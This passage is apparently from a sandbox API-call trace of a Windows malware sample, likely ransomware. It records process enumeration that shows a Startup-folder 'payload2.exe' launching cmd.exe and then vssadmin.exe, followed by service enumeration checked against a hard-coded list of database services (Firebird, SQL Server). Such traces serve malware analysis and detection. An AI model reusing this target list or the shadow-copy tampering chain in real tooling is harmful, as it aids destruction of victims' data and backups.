lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="clay_enquiry_thee.exe")) returned 1 [0054.789] lstrlenW (lpString="clay_enquiry_thee.exe") returned 21 [0054.789] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="eating.exe")) returned 1 [0054.789] lstrlenW (lpString="eating.exe") returned 10 [0054.789] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="nh_protected.exe")) returned 1 [0054.790] lstrlenW (lpString="nh_protected.exe") returned 16 [0054.790] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability.exe")) returned 1 [0054.791] lstrlenW (lpString="vulnerability.exe") returned 17 [0054.791] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="incidentoceaneast.exe")) returned 1 [0054.791] lstrlenW (lpString="incidentoceaneast.exe") returned 21 [0054.791] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ment_lo_animation.exe")) returned 1 [0054.792] lstrlenW (lpString="ment_lo_animation.exe") returned 21 [0054.792] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="counters_config_prostate.exe")) returned 1 [0054.793] lstrlenW (lpString="counters_config_prostate.exe") returned 28 [0054.793] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="teethpichuntercrude.exe")) returned 1 [0054.793] lstrlenW (lpString="teethpichuntercrude.exe") returned 23 [0054.793] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0054.794] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0054.794] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe")) returned 1 [0054.795] lstrlenW (lpString="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe") returned 65 [0054.795] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0054.795] lstrlenW (lpString="cmd.exe") returned 7 [0054.795] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0054.796] lstrlenW (lpString="conhost.exe") returned 11 [0054.796] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x9b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0054.797] lstrlenW (lpString="vssadmin.exe") returned 12 [0054.797] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0054.797] lstrlenW (lpString="VSSVC.exe") returned 9 [0054.798] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.798] lstrlenW (lpString="svchost.exe") returned 11 [0054.798] Process32NextW (in: hSnapshot=0x204, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0054.799] CloseHandle (hObject=0x204) returned 1 [0054.799] Sleep (dwMilliseconds=0x1f4) [0055.526] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x680418 [0055.527] EnumServicesStatusExW (in: hSCManager=0x680418, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 0 [0055.527] GetLastError () returned 0xea [0055.527] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x12c6) returned 0x3940ef0 [0055.527] EnumServicesStatusExW (in: hSCManager=0x680418, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3940ef0, cbBufSize=0x12c6, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3940ef0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 1 [0055.530] CloseServiceHandle (hSCObject=0x680418) returned 1 [0055.530] lstrlenW (lpString="Appinfo") returned 7 [0055.530] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0055.531] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0055.531] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0055.531] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0055.531] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0055.531] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0055.531] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0055.531] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0055.531] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0055.531] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0055.531] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0055.531] lstrlenW (lpString="AudioSrv") returned 8 [0055.531] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0055.531] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0055.531] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0055.531] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0055.531] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0055.531] lstrlenW (lpString="BFE") returned 3 [0055.531] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0055.531] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0055.531] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0055.531] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0055.531] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0055.531] lstrlenW (lpString="CryptSvc") returned 8 [0055.531] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0055.531] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0055.531] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0055.531] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0055.531] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0055.531] lstrlenW (lpString="CscService") returned 10 [0055.531] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0055.531] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0055.531] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0055.531] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0055.531] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0055.531] lstrlenW (lpString="DcomLaunch") returned 10 [0055.531] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0055.531] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0055.531] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0055.532] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0055.532] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0055.532] lstrlenW (lpString="Dhcp") returned 4 [0055.532] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0055.532] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0055.532] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0055.532] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0055.532] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0055.532] lstrlenW (lpString="Dnscache") returned 8 [0055.532] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0055.532] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0055.532] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0055.532] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0055.532] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0055.532] lstrlenW (lpString="DPS") returned 3 [0055.532] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0055.532] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0055.532] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0055.532] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0055.532] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0055.532] lstrlenW (lpString="eventlog") returned 8 [0055.532] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0055.532] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0055.532] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0055.532] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0055.532] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0055.532] lstrlenW (lpString="EventSystem") returned 11 [0055.532] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0055.532] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0055.532] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0055.532] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0055.532] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0055.532] lstrlenW (lpString="gpsvc") returned 5 [0055.532] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0055.532] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0055.532] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0055.533] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0055.533] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0055.533] lstrlenW (lpString="iphlpsvc") returned 8 [0055.533] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0055.533] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0055.533] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0055.533] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0055.533] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0055.533] lstrlenW (lpString="LanmanServer") returned 12 [0055.533] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0055.533] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0055.533] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0055.533] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0055.533] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0055.533] lstrlenW (lpString="LanmanWorkstation") returned 17 [0055.533] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0055.533] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0055.533] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0055.533] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0055.533] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0055.533] lstrlenW (lpString="lmhosts") returned 7 [0055.533] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0055.533] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0055.533] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0055.533] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0055.533] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0055.533] lstrlenW (lpString="MMCSS") returned 5 [0055.533] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0055.533] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0055.533] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0055.533] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0055.533] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0055.533] lstrlenW (lpString="MpsSvc") returned 6 [0055.533] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0055.533] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0055.533] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0055.534] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0055.534] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0055.534] lstrlenW (lpString="Netman") returned 6 [0055.534] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0055.534] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0055.534] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0055.534] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0055.534] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0055.534] lstrlenW (lpString="netprofm") returned 8 [0055.534] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0055.534] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0055.534] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0055.534] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0055.534] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0055.534] lstrlenW (lpString="NlaSvc") returned 6 [0055.534] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0055.534] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0055.534] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0055.534] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0055.534] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0055.534] lstrlenW (lpString="nsi") returned 3 [0055.534] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0055.534] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0055.534] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0055.534] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0055.534] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0055.534] lstrlenW (lpString="PcaSvc") returned 6 [0055.534] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0055.534] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0055.534] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0055.534] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0055.534] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0055.534] lstrlenW (lpString="PlugPlay") returned 8 [0055.534] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0055.534] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0055.534] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0055.534] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0055.534] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0055.535] lstrlenW (lpString="Power") returned 5 [0055.535] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0055.535] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0055.535] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0055.535] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0055.535] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0055.535] lstrlenW (lpString="ProfSvc") returned 7 [0055.535] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0055.535] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0055.535] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0055.535] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0055.535] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0055.535] lstrlenW (lpString="RpcEptMapper") returned 12 [0055.535] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0055.535] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0055.535] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0055.535] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0055.535] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0055.535] lstrlenW (lpString="RpcSs") returned 5 [0055.535] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0055.535] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0055.535] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0055.535] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0055.535] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0055.535] lstrlenW (lpString="SamSs") returned 5 [0055.535] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0055.535] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0055.535] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0055.535] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0055.535] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0055.535] lstrlenW (lpString="Schedule") returned 8 [0055.535] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0055.535] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0055.535] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0055.535] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0055.535] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0055.535] lstrlenW (lpString="SENS") returned 4 [0055.536] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0055.536] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0055.536] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0055.536] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0055.536] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0055.536] lstrlenW (lpString="ShellHWDetection") returned 16 [0055.536] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0055.536] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0055.536] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0055.536] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0055.536] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0055.536] lstrlenW (lpString="Spooler") returned 7 [0055.536] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0055.536] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0055.536] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0055.536] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0055.536] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0055.536] lstrlenW (lpString="swprv") returned 5 [0055.536] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0055.536] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0055.536] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0055.536] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0055.536] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0055.536] lstrlenW (lpString="SysMain") returned 7 [0055.536] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0055.536] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0055.536] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0055.536] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0055.536] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0055.536] lstrlenW (lpString="Themes") returned 6 [0055.536] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0055.536] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0055.536] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0055.536] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0055.536] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0055.536] lstrlenW (lpString="TrkWks") returned 6 [0055.536] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0055.537] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0055.537] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0055.537] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0055.537] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0055.537] lstrlenW (lpString="UxSms") returned 5 [0055.537] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0055.537] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0055.537] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0055.537] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0055.537] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0055.537] lstrlenW (lpString="VSS") returned 3 [0055.537] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0055.537] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0055.537] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0055.537] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0055.537] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0055.537] lstrlenW (lpString="WdiServiceHost") returned 14 [0055.537] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0055.537] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0055.537] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0055.537] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0055.537] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0055.537] lstrlenW (lpString="WdiSystemHost") returned 13 [0055.537] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0055.537] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 